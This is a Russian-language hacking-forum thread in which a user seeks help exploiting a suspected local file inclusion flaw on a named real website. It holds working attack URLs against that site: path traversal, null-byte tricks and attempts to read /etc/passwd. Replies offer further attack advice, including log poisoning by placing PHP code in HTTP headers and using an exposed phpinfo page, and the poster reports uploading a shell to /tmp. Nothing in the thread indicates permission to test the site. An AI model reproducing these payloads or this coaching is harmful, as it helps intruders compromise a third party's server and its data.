Всем привет

Имеется страничка


http://www.dirdim.com/port_featuredprojects.php?fileName=fp_usluge

название параметра запроса намекает на наличие на сайте LFI

пробую следующее:


http://www.dirdim.com/port_featuredprojects.php?fileName=./fp_usluge

страница успешно грузится


http://www.dirdim.com/port_featuredprojects.php?fileName=../fp_usluge

страница не грузится

что еще более намекает на наличие LFI

проверяю, что будет с %00


http://www.dirdim.com/port_featuredprojects.php?fileName=fp_usluge%00

страница не грузится, из чего делаю предположение о том, что параметр с чем-то конкатенируется

теперь пытаюсь заинклюдить /etc/passwd


http://www.dirdim.com/port_featuredprojects.php?fileName=etc/passwd%00



http://www.dirdim.com/port_featuredprojects.php?fileName=../etc/passwd%00



http://www.dirdim.com/port_featuredprojects.php?fileName=../../etc/passwd%00

и так далее

заинклюдить не удалось

в связи с этим несколько вопросов:

На сколько это похоже на LFI? Что такое может быть на сервере, из-за чего мне не удается подключить /etc/passwd? Как его можно раскрутить дальше?

Какие файлы вы пробуете инклюдить на windows серверах? Что потенциально опасного можно сделать с LFI, в том случае, если на сайте нет возможности залить шелл?

Заранее спасибо за ответы

LFI, смотрим

fileName=../lm_links

fileName=../port_featuredprojects

null-byte не будет работать, т.к. версия пропатчена

X-Powered-By: PHP/5.3.29-pl0-gentoo

==

есть phpinfo

fileName=../phpinfo

можно пробовать тему LFI + phpinfo

https://rdot.org/forum/showthread.php?t=1134

==

UPD

LFI + phpinfo() порекомендовал зря, тема хорошая, но не тот случай, конечно.

↑ (https://antichat.live/posts/3911470/)
LFI, смотрим
fileName=../lm_links
fileName=../port_featuredprojects
null-byte не будет работать, т.к. версия пропатчена
X-Powered-By: PHP/5.3.29-pl0-gentoo


То есть такую уязвимость можно эксплуатировать, только если получится залить шелл с расширением .php?

Можно подробнее, что значит версия пропатчена?

null-byte использовать не получится. уязвимость исправлена

Можно попробовать найти логи сервера по этой базе дефолтных путей:

/threads/324564/ (https://antichat.live/threads/324564/)

Потом отправить специальный http пакет с помощью софта InetCrack или HttpREQ:

/threads/121239/ (https://antichat.live/threads/121239/)

В заголовках пакета разместить PHP-код, он запишется в лог-файл и можно подгрузить его через LFI

↑ (https://antichat.live/posts/3911523/)
null-byte использовать не получится. уязвимость исправлена


Я правильно, понял, что нулл-байт актуален для php
[/CODE]
сделали для удобства разработки и забыли убрать?) Как часто встречается подобное? Как вы нашли его?

описанным методом у меня получилось залить шелл в tmp, но мне не ясен момент можно ли заинклудить залитый файл.

предположительно, там написано что-то вроде


include($_GET['file'] . ".php");

в этом случае я буду пытаться заинклюдить /tmp/blabla.php вместо /tmp/blabla, где реально лежит шелл


↑ (https://antichat.live/posts/3911605/)
Можно попробовать найти логи сервера по этой базе дефолтных путей:
/threads/324564/ (https://antichat.live/threads/324564/)
Потом отправить специальный http пакет с помощью софта InetCrack или HttpREQ:
/threads/121239/ (https://antichat.live/threads/121239/)
В заголовках пакета разместить PHP-код, он запишется в лог-файл и можно подгрузить его через LFI


Интересный подход

Но опять-таки непонятно, как мне найти логи, если дописывается расширение .php и нельзя использовать null byte